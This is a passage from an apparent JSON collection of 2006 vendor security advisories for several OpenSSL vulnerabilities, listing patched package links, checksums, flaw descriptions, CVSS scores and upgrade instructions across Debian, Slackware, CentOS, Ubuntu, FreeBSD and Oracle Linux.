http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_ia64.deb\n Size/MD5 checksum: 3396206 3a3d88238a48d33b39e7575a97c6cfdf\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_ia64.deb\n Size/MD5 checksum: 1038432 e2e4e1d388c5d45c8d30e16d661ad24c\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_ia64.deb\n Size/MD5 checksum: 975152 1783b49f3b7a12bd18dff0fcc37f5d68\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_m68k.deb\n Size/MD5 checksum: 2317348 b4930b1cf5e642bf509d44dd83de193f\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_m68k.deb\n Size/MD5 checksum: 661716 d5fb4eb5947c8765e268696e94a46a8b\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_m68k.deb\n Size/MD5 checksum: 889932 e1ecef3780edd38743246dfda1424e8c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_mips.deb\n Size/MD5 checksum: 2779464 591dbe4f6d73d56c9e9ff72f2d0a5385\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_mips.deb\n Size/MD5 checksum: 706682 0b3de7eef13969d065ed057fda34afc2\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_mips.deb\n Size/MD5 checksum: 896834 e2b8f38056a06f63c3ce6c10d9d95dba\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_mipsel.deb\n Size/MD5 checksum: 2767364 883d0167f6642e90e8a183b4f87a78ba\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_mipsel.deb\n Size/MD5 checksum: 694532 f4961231ef2c2b8ff46f173338a7fa36\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_mipsel.deb\n Size/MD5 checksum: 895922 2ad35f3927ba71d8054fe8cd4316f5b0\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_powerpc.deb\n Size/MD5 checksum: 2775608 0dca0ec9cf2d230ce68394849be748b1\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_powerpc.deb\n Size/MD5 checksum: 779456 6736cdc1dfe5f19013f4dee0a2b3b1cf\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_powerpc.deb\n Size/MD5 checksum: 908418 8759696eff63836597e4247c06ba7b22\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_s390.deb\n Size/MD5 checksum: 2717788 12fb63ace68a2698c19c725530ab18d9\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_s390.deb\n Size/MD5 checksum: 814012 adcee88124369de1daeae0545e0517a0\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_s390.deb\n Size/MD5 checksum: 918524 b93704f4ce84489d4ee163098a783962\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_sparc.deb\n Size/MD5 checksum: 2630606 a20a47b2f291810a09fd04a4c130ddb0\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_sparc.deb\n Size/MD5 checksum: 1886152 8521da994bf2a6df3bdc457fb3e0683b\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_sparc.deb\n Size/MD5 checksum: 924556 ff8cee5f5a9653a9dd917b4ec51166ee\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;", "cvss3": {}, "published": "2006-10-02T19:33:19", "type": "debian", "title": "[SECURITY] [DSA 1185-2] New openssl packages fix arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2940"], "modified": "2006-10-02T19:33:19", "id": "DEBIAN:DSA-1185-2:4AF37", "href": "https://lists.debian.org/debian-security-announce/2006/msg00282.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2021-07-28T14:46:38", "description": "New openssl packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/openssl-0.9.7l-i486-1_slack10.2.tgz:\n Upgraded to shared libraries from openssl-0.9.7l.\n See openssl package update below.\n (* Security fix *)\npatches/packages/openssl-0.9.7l-i486-1_slack10.2.tgz:\n Upgraded to openssl-0.9.7l.\n This fixes a few security related issues:\n During the parsing of certain invalid ASN.1 structures an error\n condition is mishandled. This can result in an infinite loop which\n consumes system memory (CVE-2006-2937). (This issue did not affect\n OpenSSL versions prior to 0.9.7)\n Thanks to Dr S. N. Henson of Open Network Security and NISCC.\n Certain types of public key can take disproportionate amounts of\n time to process. This could be used by an attacker in a denial of\n service attack (CVE-2006-2940).\n Thanks to Dr S. N. Henson of Open Network Security and NISCC.\n A buffer overflow was discovered in the SSL_get_shared_ciphers()\n utility function. An attacker could send a list of ciphers to an\n application that uses this function and overrun a buffer.\n (CVE-2006-3738)\n Thanks to Tavis Ormandy and Will Drewry of the Google Security Team.\n A flaw in the SSLv2 client code was discovered. When a client\n application used OpenSSL to create an SSLv2 connection to a malicious\n server, that server could cause the client to crash (CVE-2006-4343).\n Thanks to Tavis Ormandy and Will Drewry of the Google Security Team.\n Links to the CVE entries will be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/openssl-solibs-0.9.7l-i386-1_slack9.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/openssl-0.9.7l-i386-1_slack9.0.tgz\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/openssl-solibs-0.9.7l-i486-1_slack9.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/openssl-0.9.7l-i486-1_slack9.1.tgz\n\nUpdated packages for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/openssl-solibs-0.9.7l-i486-1_slack10.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/openssl-0.9.7l-i486-1_slack10.0.tgz\n\nUpdated packages for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/openssl-solibs-0.9.7l-i486-1_slack10.1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/openssl-0.9.7l-i486-1_slack10.1.tgz\n\nUpdated packages for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/openssl-solibs-0.9.7l-i486-1_slack10.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/openssl-0.9.7l-i486-1_slack10.2.tgz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-0.9.8d-i486-1.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-0.9.8d-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.0 packages:\n3b17c8be79ca99cb16321d2675f2885d openssl-0.9.7l-i386-1_slack9.0.tgz\na7cb86681f01b57f7bff49842b393a67 openssl-solibs-0.9.7l-i386-1_slack9.0.tgz\n\nSlackware 9.1 packages:\nf222c26925ce542a25a93df674e8106c openssl-0.9.7l-i486-1_slack9.1.tgz\nfca221391f0b591373b6e38f1d732d63 openssl-solibs-0.9.7l-i486-1_slack9.1.tgz\n\nSlackware 10.0 packages:\na1013cef56210154a2259c5135f1d047 openssl-0.9.7l-i486-1_slack10.0.tgz\n35c40208e50ca4bcd7e7e16ce5db1526 openssl-solibs-0.9.7l-i486-1_slack10.0.tgz\n\nSlackware 10.1 packages:\n6c87f5baca8855cd07031824b747fe80 openssl-0.9.7l-i486-1_slack10.1.tgz\n3ae63bd5b7178f880e8ed5a3af602b50 openssl-solibs-0.9.7l-i486-1_slack10.1.tgz\n\nSlackware 10.2 packages:\na97c874a4bf6dc4ca6a4617966108a45 openssl-0.9.7l-i486-1_slack10.2.tgz\n06b462fad82d28af4fba3f35f2ed25a1 openssl-solibs-0.9.7l-i486-1_slack10.2.tgz\n\nSlackware -current package:\n88264ebbe45eb908c2d3f3f32c367cf6 openssl-solibs-0.9.8d-i486-1.tgz\n9f9d2d98fefd5cbd9334cfa374934efa openssl-0.9.8d-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg openssl-solibs-0.9.7l-i486-1_slack10.2.tgz openssl-0.9.7l-i486-1_slack10.2.tgz", "cvss3": {}, "published": "2006-09-29T07:57:13", "type": "slackware", "title": "[slackware-security] openssl", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-09-29T07:57:13", "id": "SSA-2006-272-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.676946", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2022-02-27T15:57:36", "description": "**CentOS Errata and Security Advisory** CESA-2006:0695-01\n\n\nThe OpenSSL toolkit provides support for secure communications between\r\nmachines. OpenSSL includes a certificate management tool and shared\r\nlibraries which provide various cryptographic algorithms and protocols.\r\n\r\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\r\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\r\nattacker could send a list of ciphers to an application that used this\r\nfunction and overrun a buffer (CVE-2006-3738). Few applications make use\r\nof this vulnerable function and generally it is used only when applications\r\nare compiled for debugging.\r\n\r\nTavis Ormandy and Will Drewry of the Google Security Team discovered a \r\nflaw in the SSLv2 client code. When a client application used OpenSSL to\r\ncreate an SSLv2 connection to a malicious server, that server could cause\r\nthe client to crash. (CVE-2006-4343)\r\n\r\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently\r\ndeveloped an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered\r\ndenial of service vulnerabilities: \r\n\r\n* Certain public key types can take disproportionate amounts of time to\r\nprocess, leading to a denial of service. (CVE-2006-2940)\r\n\r\n* During parsing of certain invalid ASN.1 structures an error condition was\r\nmishandled. This can result in an infinite loop which consumed system\r\nmemory (CVE-2006-2937). This issue does not affect the OpenSSL version\r\ndistributed in Red Hat Enterprise Linux 2.1.\r\n\r\nThese vulnerabilities can affect applications which use OpenSSL to parse\r\nASN.1 data from untrusted sources, including SSL servers which enable\r\nclient authentication and S/MIME applications.\r\n\r\nUsers are advised to upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.\r\n\r\nNote: After installing this update, users are advised to either restart all\r\nservices that use OpenSSL or restart their system.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2006-October/050230.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl095a\nopenssl096\n\n", "cvss3": {}, "published": "2006-10-02T01:43:05", "type": "centos", "title": "openssl, openssl095a, openssl096 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-10-02T01:43:05", "id": "CESA-2006:0695-01", "href": "https://lists.centos.org/pipermail/centos-announce/2006-October/050230.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T15:58:08", "description": "**CentOS Errata and Security Advisory** CESA-2006:0695\n\n\nThe OpenSSL toolkit provides support for secure communications between\r\nmachines. OpenSSL includes a certificate management tool and shared\r\nlibraries which provide various cryptographic algorithms and protocols.\r\n\r\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\r\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\r\nattacker could send a list of ciphers to an application that used this\r\nfunction and overrun a buffer (CVE-2006-3738). Few applications make use\r\nof this vulnerable function and generally it is used only when applications\r\nare compiled for debugging.\r\n\r\nTavis Ormandy and Will Drewry of the Google Security Team discovered a \r\nflaw in the SSLv2 client code. When a client application used OpenSSL to\r\ncreate an SSLv2 connection to a malicious server, that server could cause\r\nthe client to crash. (CVE-2006-4343)\r\n\r\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently\r\ndeveloped an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered\r\ndenial of service vulnerabilities: \r\n\r\n* Certain public key types can take disproportionate amounts of time to\r\nprocess, leading to a denial of service. (CVE-2006-2940)\r\n\r\n* During parsing of certain invalid ASN.1 structures an error condition was\r\nmishandled. This can result in an infinite loop which consumed system\r\nmemory (CVE-2006-2937). This issue does not affect the OpenSSL version\r\ndistributed in Red Hat Enterprise Linux 2.1.\r\n\r\nThese vulnerabilities can affect applications which use OpenSSL to parse\r\nASN.1 data from untrusted sources, including SSL servers which enable\r\nclient authentication and S/MIME applications.\r\n\r\nUsers are advised to upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.\r\n\r\nNote: After installing this update, users are advised to either restart all\r\nservices that use OpenSSL or restart their system.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050216.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050217.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050218.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050222.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050225.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050226.html\nhttps://lists.centos.org/pipermail/centos-announce/2006-September/050228.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl096b\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2006:0695", "cvss3": {}, "published": "2006-09-29T03:35:21", "type": "centos", "title": "openssl, openssl096b security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2006-09-29T17:05:03", "id": "CESA-2006:0695", "href": "https://lists.centos.org/pipermail/centos-announce/2006-September/050216.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T13:35:57", "description": "Dr. Henson of the OpenSSL core team and Open Network Security \ndiscovered a mishandled error condition in the ASN.1 parser. By \nsending specially crafted packet data, a remote attacker could exploit \nthis to trigger an infinite loop, which would render the service \nunusable and consume all available system memory. (CVE-2006-2937)\n\nCertain types of public key could take disproportionate amounts of \ntime to process. The library now limits the maximum key exponent size \nto avoid Denial of Service attacks. (CVE-2006-2940)\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a \nbuffer overflow in the SSL_get_shared_ciphers() function. By sending \nspecially crafted packets to applications that use this function (like \nExim, MySQL, or the openssl command line tool), a remote attacker \ncould exploit this to execute arbitrary code with the server's \nprivileges. (CVE-2006-3738)\n\nTavis Ormandy and Will Drewry of the Google Security Team reported \nthat the get_server_hello() function did not sufficiently check the \nclient's session certificate. This could be exploited to crash clients \nby remote attackers sending specially crafted SSL responses. \n(CVE-2006-4343)\n", "cvss3": {}, "published": "2006-09-29T00:00:00", "type": "ubuntu", "title": "openssl vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4343", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738"], "modified": "2006-09-29T00:00:00", "id": "USN-353-1", "href": "https://ubuntu.com/security/notices/USN-353-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T13:35:54", "description": "USN-353-1 fixed several vulnerabilities in OpenSSL. However, Mark J \nCox noticed that the applied patch for CVE-2006-2940 was flawed. This \nupdate corrects that patch.\n\nFor reference, this is the relevant part of the original advisory:\n\nCertain types of public key could take disproportionate amounts of \ntime to process. The library now limits the maximum key exponent \nsize to avoid Denial of Service attacks. (CVE-2006-2940)\n", "cvss3": {}, "published": "2006-10-05T00:00:00", "type": "ubuntu", "title": "OpenSSL vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2940"], "modified": "2006-10-05T00:00:00", "id": "USN-353-2", "href": "https://ubuntu.com/security/notices/USN-353-2", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T16:03:50", "description": "\n\nProblem Description:\nSeveral problems have been found in OpenSSL:\n\nDuring the parsing of certain invalid ASN1 structures an\n\t error condition is mishandled, possibly resulting in an\n\t infinite loop.\nA buffer overflow exists in the SSL_get_shared_ciphers\n\t function.\nA NULL pointer may be dereferenced in the SSL version 2\n\t client code.\n\nIn addition, many applications using OpenSSL do not perform\n\t any validation of the lengths of public keys being used.\nImpact:\nServers which parse ASN1 data from untrusted sources may be\n\t vulnerable to a denial of service attack.\nAn attacker accessing a server which uses SSL version 2 may\n\t be able to execute arbitrary code with the privileges of that\n\t server.\nA malicious SSL server can cause clients connecting using\n\t SSL version 2 to crash.\nApplications which perform public key operations using\n\t untrusted keys may be vulnerable to a denial of service\n\t attack.\nWorkaround:\nNo workaround is available, but not all of the\n\t vulnerabilities mentioned affect all applications.\n\n", "cvss3": {}, "published": "2006-09-28T00:00:00", "type": "freebsd", "title": "OpenSSL -- Multiple problems in crypto(3)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2937", "CVE-2006-2938", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2016-08-09T00:00:00", "id": "0F37D765-C5D4-11DB-9F82-000E0C2E438A", "href": "https://vuxml.freebsd.org/freebsd/0f37d765-c5d4-11db-9f82-000e0c2e438a.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:25", "description": " [0.9.7a-43.14]\n - fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n - fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n - fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n - fix CVE-2006-4343 - sslv2 client DoS (#206940)\n \n [0.9.7a-43.11]\n - fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n - don't overwrite customized ca-bundle.pem on upgrade (#175811) ", "cvss3": {}, "published": "2006-11-30T00:00:00", "type": "oraclelinux", "title": "Important openssl security update ", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2006-11-30T00:00:00", "id": "ELSA-2006-0695", "href": "http://linux.oracle.com/errata/ELSA-2006-0695.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "description": " [0.9.7a-43.14]\n - fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n - fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n - fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n - fix CVE-2006-4343 - sslv2 client DoS (#206940)\n \n [0.9.7a-43.11]\n - fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n - don't overwrite customized ca-bundle.pem on upgrade (#175811) ", "cvss3": {}, "published": "2006-11-30T00:00:00", "type": "oraclelinux", "title": "Important openssl security update ", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2006-11-30T00:00:00", "id": "ELSA-2006-0661", "href": "http://linux.oracle.com/errata/ELSA-2006-0661.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-13T09:23:28", "description": "[1.0.1m-2.0.1]\n- update to upstream 1.0.1m\n- update to fips canister 2.0.9\n- regenerated below patches\n openssl-1.0.1-beta2-rpmbuild.patch\n openssl-1.0.1m-rhcompat.patch\n openssl-1.0.1m-ecc-suiteb.patch\n openssl-1.0.1m-fips-mode.patch\n openssl-1.0.1m-version.patch\n openssl-1.0.1m-evp-devel.patch\n[1.0.1j-2.0.4]\n- [Orabug 20182267] The openssl-fips-devel package should Provide:\n openssl-devel and openssl-devel(x86-64) like the standard -devel\n package\n- The openssl-fips-devel package should include fips.h and fips_rand.h\n for apps that want to build against FIPS* APIs\n[1.0.1j-2.0.3]\n- [Orabug 20086847] reintroduce patch openssl-1.0.1e-ecc-suiteb.patch,\n update ec_curve.c which gets copied into build tree to match the patch\n (ie only have curves which are advertised). The change items from the\n orignal patch are as follows:\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1j-2.0.2]\n- update README.FIPS with step-by-step install instructions\n[1.0.1j-2.0.1]\n- update to upstream 1.0.1j\n- change name to openssl-fips\n- change Obsoletes: openssl to Conflicts: openssl\n- add Provides: openssl\n[1.0.1i-2.0.3.fips]\n- update to fips canister 2.0.8 to remove Dual EC DRBG\n- run gcc -v so the gcc build version is captured in the build log\n[1.0.1i-2.0.2.fips]\n- flip EVP_CIPH_* flag bits for compatibility with original RH patched pkg\n[1.0.1i-2.0.1.fips]\n- build against upstream 1.0.1i\n- build against fips validated canister 2.0.7\n- add patch to support fips=1\n- rename pkg to openssl-fips and Obsolete openssl\n[1.0.1e-16.14]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-16.4]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-16.3]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-16.2]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-16.1]\n- add back some no-op symbols that were inadvertently dropped\n[1.0.1e-16]\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1e-15]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n[1.0.1e-14]\n- installation of dracut-fips marks that the FIPS module is installed\n[1.0.1e-13]\n- avoid dlopening libssl.so from libcrypto\n[1.0.1e-12]\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-11]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n[1.0.1e-9]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-8]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-7]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-6]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-5]\n- use _prefix macro\n[1.0.1e-4]\n- add relro linking flag\n[1.0.1e-2]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-1]\n- rebase to the 1.0.1e upstream version\n[1.0.0-28]\n- fix for CVE-2013-0169 - SSL/TLS CBC timing attack (#907589)\n- fix for CVE-2013-0166 - DoS in OCSP signatures checking (#908052)\n- enable compression only if explicitly asked for or OPENSSL_DEFAULT_ZLIB\n environment variable is set (fixes CVE-2012-4929 #857051)\n- use __secure_getenv() everywhere instead of getenv() (#839735)\n[1.0.0-27]\n- fix sslrand(1) and sslpasswd(1) reference in openssl(1) manpage (#841645)\n- drop superfluous lib64 fixup in pkgconfig .pc files (#770872)\n- force BIO_accept_new(*:\n) to listen on IPv4\n[1.0.0-26]\n- use PKCS#8 when writing private keys in FIPS mode as the old\n PEM encryption mode is not FIPS compatible (#812348)\n[1.0.0-25]\n- fix for CVE-2012-2333 - improper checking for record length in DTLS (#820686)\n- properly initialize tkeylen in the CVE-2012-0884 fix\n[1.0.0-24]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() 